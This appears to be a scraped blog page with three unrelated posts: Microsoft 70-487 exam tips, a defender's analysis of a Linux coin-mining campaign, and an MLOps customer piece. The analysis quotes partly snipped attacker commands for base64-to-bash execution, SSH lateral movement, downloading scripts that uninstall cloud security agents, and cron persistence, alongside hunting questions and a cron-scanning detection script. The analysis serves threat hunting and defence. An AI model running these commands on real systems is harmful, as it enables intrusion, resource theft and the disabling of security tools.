The Microsoft 70-487 exam costs $165, and you can register for it by visiting the Microsoft registration portal. It is also essential to note that this exam is available in many languages, such as English, Simplified Chinese, French, German, Portuguese, and Japanese. This lets candidates pick the language they understand best for the best result.

One special feature of this exam is that it does not give numerical scores but rather a simple pass or fail status, though it provides score bars for each topic showing the areas where the applicant is weak or strong.

Prerequisites for Microsoft 70-487 Exam


To be eligible for this exam, you must hold the MCSA: Web Applications certification, which indicates that you've passed the 70-480 (or 70-483) and 70-486 exams. You will also be expected to have at least three years' experience developing ASP.NET MVC-based solutions. Besides this, you need to be an expert in developing web applications and familiar with HTTP services. This intermediate-level exam is well suited to IT professionals who are highly skilled in developing and deploying server solutions in multi-layered environments such as cloud-based Windows Azure.

Available Exam Preparation Resources

When preparing for a Microsoft exam, it is vital to use quality resources, which are likely to improve your odds of passing. Since most of these resources come with a price, it is wise to go for learning materials that give you accurate information at an affordable price. This way, you will manage your funds well and get value for money.

First, let us determine the target audience for this certification exam. The Microsoft 70-487 exam is aimed at individuals who are experts in ASP.NET MVC. They also have a thorough understanding of Visual Studio 2017 and .NET Core. In addition, applicants should have at least three to five years of experience working in web development. Having determined the audience for the exam, let us look at a few tips that will help you pass your exam on your first attempt.

Understand the question formats and exam content

This is very important to your success in the exam. You should not wait until the exam date to understand the content of the exam. There are various materials and guides for Microsoft 70-487, and studying from them will keep you up to date with what to expect in the actual exam. The exam uses several question formats, such as drag and drop, case studies, multiple-choice questions, and active screen. The case studies are based upon requirements and projects intended to assess your analytical ability and skills. You might also come across questions on debugging code and adding code. Concerning question content, you must have some knowledge of WCF. You also need to be familiar with Visual Studio tools, along with deployment (including IIS). Take time to understand web development strategies, HTTP, and FTP.

Use Various Study Materials

There are various study materials you can find online. You can start with MVA (Microsoft Virtual Academy). The platform offers a broad range of videos and tutorial materials for this exam, and the best thing about it is that it is free. You can also explore other websites for online practice tests.

The Microsoft 70-487 exam is an outstanding choice for professional developers with some level of experience in web development. As stated earlier, the exam is not easy, so you need to study hard to be able to pass on the first attempt.

Learning from cryptocurrency mining attack scripts on Linux

Cryptocurrency mining attacks continue to represent a threat to many of our Azure Linux customers. In the past, we've talked about how some attackers use brute force techniques to guess account names and passwords and use those to gain access to machines. Today, we're talking about an attack that a few of our customers have seen, where a service is exploited to run the attacker's code directly on the machine hosting the service.


This attack is interesting for several reasons. The attacker echoes their scripts in, so we can see what they want to do, not just what executes on the machine. The scripts cover a wide range of possible services to exploit, so they demonstrate how far the campaign can reach. Finally, because we have the scripts themselves, we can pull out good examples from the Lateral Movement, Defense Evasion, Persistence, and Objectives sections of the Linux MITRE ATT&CK Matrix and use those to talk about hunting on your own data.

Initial vector


For this attack, the first indication something is wrong in the audited logs is an echo command piping a base64-encoded command into base64 for decoding and then piping the result into bash. Across our users, this first command has a parent process of an application or service exposed to the internet, and the command is run by the user account associated with that process. This indicates the application or service itself was exploited in order to run the commands. While some of these accounts are specific to a customer, we also see common accounts like Ubuntu, Jenkins, and Hadoop being used.

/bin/sh -c "echo ZXhlYyAmPi9kZXYvbnVsbApleHBvcnQgUEFUSD0kUEFUSDovYmluOi9zYmluOi91c3IvYmluOi91c3Ivc2JpbjovdXNyL2xvY2FsL2JpbjovdXNyL2xvY2FsL3NiaW4K<snip>CmRvbmUK|base64 -d|bash"

Scripts


It is worth taking a brief aside to talk about how this attacker uses scripts. In this case, they do nearly everything through base64-encoded scripts. One of the interesting things about those scripts is that they all start with the same first two lines: redirecting both the standard error and standard output streams to /dev/null and setting the path variable to locations the attacker knows generally hold the system commands they want to run.

exec &>/dev/null
export PATH=$PATH:/bin:/sbin:/usr/bin:/usr/sbin:/usr/local/bin:/usr/local/sbin

This indicates that when each of them is base64 encoded, the first part of the encoding is the same every time.

ZXhlYyAmPi9kZXYvbnVsbApleHBvcnQgUEFUSD0kUEFUSDovYmluOi9zYmluOi91c3IvYmluOi91c3Ivc2JpbjovdXNyL2xvY2FsL2JpbjovdXNyL2xvY2FsL3NiaW4K
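
You can verify the shared prefix yourself; encoding those two fixed lines in Python reproduces the beginning of the attacker's payloads, which makes a handy string to search or pivot on in logs.

import base64

preamble = (
    "exec &>/dev/null\n"
    "export PATH=$PATH:/bin:/sbin:/usr/bin:/usr/sbin:/usr/local/bin:/usr/local/sbin\n"
)

# The preamble is 96 bytes (a multiple of 3), so its base64 encoding is a
# fixed 128-character prefix regardless of what the rest of the script says.
print(base64.b64encode(preamble.encode()).decode())
# Output matches the encoded prefix shown above.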

The use of the same command is particularly helpful when trying to tie attacks together across a large set of machines. The scripts themselves are also interesting because we can see what the attacker intended to run. As defenders, it can be very valuable to look at attacker scripts whenever you can so you can see how they are trying to manipulate systems. For instance, this attacker uses a for loop to cycle through different possible domain names. This type of insight gives defenders more data to pivot on during an investigation.

for h in onion.glass civiclink.network tor2web.io onion.sh onion.mn onion.in.net onion.to
do
if ! ls /proc/$(cat /tmp/.X11-unix/01)/io; then
x t<snip>v.$h
else
break
fi
done

We observed this attacker use over thirty different encoded scripts across a number of customers, but they boiled down to roughly a dozen basic scripts with small differences in executable names or download sites. Within those scripts are some interesting examples that we can tie directly to the MITRE ATT&CK Matrix for Linux.

Lateral Movement


While it isn’t the first thing the attacker does, they do use an interesting combination of Discovery (T1018: Remote System Discovery) and Lateral Movement (T1021: Remote Services) techniques to infect other hosts. They grep through the files .bash_history, /etc/hosts, and .ssh/known_hosts looking for IP addresses. They then attempt to pass their initial encoded script into each host, using both the root account and the account they compromised on their current host, without a password. Note that the xssh function appears before the call in the original script.

hosts=$(grep -oE "\b([0-9]{1,3}\.){3}[0-9]{1,3}\b" ~/.bash_history /etc/hosts ~/.ssh/known_hosts |awk -F: {'print $2'}|sort|uniq ;awk {'print $1'} $HOME/.ssh/known_hosts|sort|uniq|grep -v =|sort|uniq)
for h in $hosts;do xssh root $h; xssh $USER $h & done
------
xssh() {
ssh -oBatchMode=yes -oConnectTimeout=5 -oPasswordAuthentication=no -oPubkeyAuthentication=yes -oStrictHostKeyChecking=no $1@$2 'echo ZXhlYyA<snip>KZG9uZQo=|base64 -d|bash'
}

In each case, after the initial foothold is gained, the attacker uses a similar set of Defense Evasion techniques.

Defense Evasion


Over various scripts, the attacker uses the T1107: File Deletion, T1222: File and Directory Permissions Modification, and T1089: Disabling Security Tools techniques, as well as the obvious by this point, T1064: Scripting.

In one script, they first make a randomly named file:

z=./$(date|md5sum|cut -f1 -d" ")

After they download their executable into that file, they modify the downloaded file for execution, run it, then delete the file from disk:

chmod +x $z;$z;rm -f

In another script, the attacker tries to download then run uninstall files for the Alibaba Cloud Security Server Guard and the AliCloud CloudMonitor service (the variable $w is set as a wget command earlier in the script).

$w update.aegis.aliyun.com/download/uninstall.sh|bash
$w update.aegis.aliyun.com/download/quartz_uninstall.sh|bash
/usr/local/qcloud/stargate/admin/uninstall.sh

Persistence


Once the coin miner is up and running, this attacker uses a combination of T1168: Local Job Scheduling and T1501: Systemd Service scheduled tasks for persistence. The snippet below is taken from another part of a script, where they echo an ntpdate call and one of their base64-encoded scripts into the file systemd-ntpdate and then add a cron job to run that file. The encoded script here is basically the same as the original script that started off the intrusion.

echo -e "#\x21/bin/bash\nexec &>/dev/null\nntpdate ntp.aliyun.com\nsleep $((RANDOM % 600))\necho ZXhlYyAmPi9<snip>2gKZmkK|base64 -d|bash" > /lib/systemd/systemd-ntpdate
echo "0 * * * * root /lib/systemd/systemd-ntpdate" > /etc/cron.d/0systemd-ntpdate
touch -r /bin/grep /lib/systemd/systemd-ntpdate
touch -r /bin/grep /etc/cron.d/0systemd-ntpdate
chmod +x /lib/systemd/systemd-ntpdate

Objectives


As previously mentioned, the main objective of this attacker is to get a coin miner started. They do this in the very first script that is run, using the T1496: Resource Hijacking technique. One of the interesting things about this attack is that while they start by trying to get the coin miner going with the initially compromised account, one of the subsequent scripts attempts to start it using commands from different pieces of management software (T1072: Third-party Software).

ansible all -m shell -a 'echo ZXh<snip>uZQo=|base64 -d|bash'
knife ssh 'name:*' 'echo ZXh<snip>uZQo=|base64 -d|bash'
salt '*' cmd.run 'echo ZXh<snip>ZQo=|base64 -d|bash'

Hunting


ASC Linux customers should expect to see coin mining or suspicious download alerts from this type of activity, but what if you wanted to hunt for it yourself? If you use the above script examples, there are several indicators you could follow up on, especially if you have command line logging.

◉ Do you see unexpected connections to onion and tor sites?

◉ Do you see unexpected ssh connections between hosts?

◉ Do you see an increase in activity from a particular user?

◉ Do you see base64 commands echoed, decoded, then piped into bash? Any one of those could be suspicious depending on your own network.

◉ Check your cron jobs, do you see wgets or base64 encoded lines there? (A short script for this check follows the list.)

◉ Check the services running on your machines, do you see anything unexpected?

◉ In reference to the Objectives section above, do you see commands for pieces of software you don’t have installed?
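
For the cron-job check, a rough sketch like the one below (paths vary by distribution, and the patterns are only a starting point) flags entries that contain wget, curl, or base64 pipes into bash.

import glob
import re

# Common cron locations on many distributions; adjust for your environment.
CRON_GLOBS = ["/etc/crontab", "/etc/cron.d/*", "/var/spool/cron/crontabs/*"]
SUSPICIOUS = re.compile(r"(wget|curl|base64\s+-d|\|\s*bash)")

for pattern in CRON_GLOBS:
    for path in glob.glob(pattern):
        try:
            with open(path, errors="replace") as cron_file:
                for lineno, line in enumerate(cron_file, 1):
                    if SUSPICIOUS.search(line):
                        print(f"{path}:{lineno}: {line.rstrip()}")
        except PermissionError:
            print(f"{path}: permission denied (rerun with sufficient privileges)")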

Azure Sentinel can help with your hunting as well. If you are an Azure Security Center customer already, we make it easy to integrate into Azure Sentinel.

Defense


Azure Study Materials, Azure Guides, Azure Certifications, Azure Online Exam, Azure Tutorial and Material
In addition to hunting, there are a few things you can do to defend yourself from these types of attacks. If you have internet-facing services, make sure you are keeping them up to date, changing any default passwords, and taking advantage of some of the other credential management tools Azure offers, like just-in-time (JIT) access, password-less sign-in, and Azure Key Vault. Monitor your Azure machine utilization rates; an unexpected increase in usage could indicate a coin miner.

Identifying attacks on Linux systems


Coin miners represent a continuing threat to machines exposed to the internet. While it's generally easy to block a known-bad IP or use a signature-based antivirus, by studying attacker tactics, techniques, and procedures, defenders can find new and more reliable ways to protect their environments.

While we talk about a specific coin miner attacker in this post, the basic techniques highlighted above are used by many different types of attackers of Linux systems. We see Lateral movement, Defense Evasion, and Persistence techniques similar to the above used by different attackers regularly and are continually adding new detections based on our investigations.

Wednesday, 22 January 2020

MLOps—the path to building a competitive edge

Enterprises today are transforming their businesses using Machine Learning (ML) to develop a lasting competitive advantage. From healthcare to transportation, supply chain to risk management, machine learning is becoming pervasive across industries, disrupting markets and reshaping business models.

Organizations need the technology and tools required to build and deploy successful machine learning models and operate in an agile way. MLOps is the key to making machine learning projects successful at scale. What is MLOps? It is the practice of collaboration between data science and IT teams, designed to accelerate the entire machine learning lifecycle across model development, deployment, monitoring, and more. Microsoft Azure Machine Learning enables companies that fully embrace MLOps practices to truly realize the potential of AI in their business.

One great example of a customer transforming their business with machine learning and MLOps is TransLink. They support Metro Vancouver's transportation network, which served 400 million total boardings from residents and visitors as of 2018. With an extensive bus system spanning 1,800 square kilometers, TransLink customers depend heavily on accurate bus departure times to plan their journeys.

To enhance the customer experience, TransLink deployed 18,000 different sets of machine learning models to better predict bus departure times, incorporating factors like traffic, bad weather, and other schedule disruptions. Using MLOps with Azure Machine Learning, they were able to manage and deliver the models at scale.

“With MLOps in Azure Machine Learning, TransLink has moved all models to production and improved predictions by 74 percent, so customers can better plan their journey on TransLink's network. This has resulted in a 50 percent reduction on average in customer wait times at stops.”–Sze-Wan Ng, Director of Analytics & Development, TransLink.

Johnson Controls is another customer using Machine Learning Operations at scale. For over 130 years, they have produced fire, HVAC and security equipment for buildings. Johnson Controls is now in the middle of a smart city revolution, with Machine Learning being a central aspect of their equipment maintenance approach.

Johnson Controls runs thousands of chillers with 70 different types of sensors each, streaming terabytes of data. MLOps helped put models into production in a timely fashion, with a repeatable process, to deliver real-time insights on maintenance routines. As a result, chiller shutdowns could be predicted days in advance and mitigated effectively, delivering cost savings and increasing customer satisfaction.

“Using the MLOps capabilities in Azure Machine Learning, we were able to decrease both mean time to repair and unplanned downtime by over 66 percent, resulting in substantial business gains.”–Vijaya Sekhar Chennupati, Applied Data Scientist at Johnson Controls

Getting started with MLOps


To take full advantage of MLOps, organizations need to apply the same rigor and processes as other software development projects.

To help organizations with their machine learning journey, GigaOm developed the MLOps vision report that includes best practices for effective implementation and a maturity model.

Maturity is measured through five levels of development across key categories such as strategy, architecture, modeling, processes, and governance. Using the maturity model, enterprises can understand where they are and determine what steps to take to ‘level up’ and achieve business objectives.


“Organizations can address the challenges of developing AI solutions by applying MLOps and implementing best practices. The report and MLOps maturity model from GigaOm can be a very valuable tool in this journey,”– Vijaya Sekhar Chennupati, Applied Data Scientist at Johnson Controls.

Source: microsoft.com